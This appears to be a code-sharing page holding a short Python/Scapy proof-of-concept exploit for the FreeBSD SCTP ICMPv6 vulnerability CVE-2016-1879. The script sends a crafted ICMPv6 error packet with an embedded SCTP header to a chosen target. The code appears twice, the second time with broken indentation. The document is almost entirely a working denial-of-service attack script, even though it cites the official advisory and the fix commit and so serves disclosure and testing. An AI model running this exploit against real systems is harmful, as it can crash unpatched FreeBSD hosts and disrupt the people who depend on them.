takeshixx · January 22, 2016 20:06
diff --git a/byebyebsd.py b/byebyebsd.py
 # FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
 # https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc
 # https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103
 import sys
 from scapy.all import *

 if len(sys.argv) is not 3:
    print('{} target_ip interface'.format(sys.argv[0]))
    exit(1)

 IP6_DST = sys.argv[1]
 IF_SRC = sys.argv[2]

 # Works with ICMPv6DestUnreach(), ICMPv6ParamProblem() and ICMPv6PacketTooBig()
 packet = Ether()/IPv6(dst=IP6_DST)/ICMPv6PacketTooBig()/IPv6(nh=132, dst=IP6_DST)
 sendp(packet, iface=IF_SRC)
	# FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
	# https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc
	# https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103
	import sys
	from scapy.all import *

	if len(sys.argv) is not 3:
	print('{} target_ip interface'.format(sys.argv[0]))
	exit(1)

	IP6_DST = sys.argv[1]
	IF_SRC = sys.argv[2]

	# Works with ICMPv6DestUnreach(), ICMPv6ParamProblem() and ICMPv6PacketTooBig()
	packet = Ether()/IPv6(dst=IP6_DST)/ICMPv6PacketTooBig()/IPv6(nh=132, dst=IP6_DST)
	sendp(packet, iface=IF_SRC)